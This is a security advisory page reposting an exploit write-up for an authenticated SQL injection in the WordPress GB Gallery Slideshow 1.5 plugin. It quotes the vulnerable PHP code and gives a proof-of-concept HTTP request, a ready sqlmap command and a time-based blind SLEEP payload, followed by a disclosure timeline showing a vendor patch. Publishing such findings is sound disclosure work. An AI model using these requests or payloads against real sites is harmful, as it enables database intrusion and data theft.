WordPress GB Gallery Slideshow 1.5 SQL Injection *youtube

2014.08.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Wordpress GB Gallery Slideshow 1.5 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://gb-plugins.com/ # Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip # Date : 2014-08-09 # Tested on : Linux / sqlmap 1.0-dev-5b2ded0 Linux / Mozilla Firefox ###################### # Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php ###################### # Vulnerable code : if(isset($_POST['selected_group'])){ global $gb_post_type, $gb_group_table, $wpdb; $my_group_id = $_POST['selected_group']; $my_group = $wpdb->get_results( "SELECT groups FROM $gb_group_table WHERE id = ".$my_group_id ); $args = array( $_POST['selected_group'] it's not sanitized. ###################### PoC Exploit: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Accept-language: en-us,en;q=0.5 Accept-encoding: gzip,deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-agent: sqlmap/1.0-dev-5b2ded0 (http://sqlmap.org) Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 Host: 10.0.0.67 Cookie: wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C5ae003a01e51c11e530c14f6149c9d07; wp-settings-time-1=1407537471; wp-settings-time-2=1406916594; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse; voted_2=6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407707530%7C6988bc86de7b7790fca51ea294e171a1; redux_current_tab=3 Pragma: no-cache Cache-control: no-cache,no-store Content-type: application/x-www-form-urlencoded; charset=utf-8 Content-length: 120 Connection: close action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=[SQL_Injection] Exploit via sqlmap: sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://localhost/wp-admin/admin-ajax.php" \ --data="action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2" -p selected_group --dbms=mysql --- Place: POST Parameter: selected_group Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5) Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) --- PoC Video: https://www.youtube.com/watch?v=CoPVqXwE3W4 ###################### # Vulnerability Disclosure Timeline: 2014-08-09: Discovered vulnerability 2014-08-09: Vendor Notification (Web Customers Service Form) 2014-08-10: Vendor Response/Feedback 2014-08-11: Vendor Fix/Patch 2014-08-11: Public Disclosure ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww #####################

References:

https://www.youtube.com/watch?v=CoPVqXwE3W4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top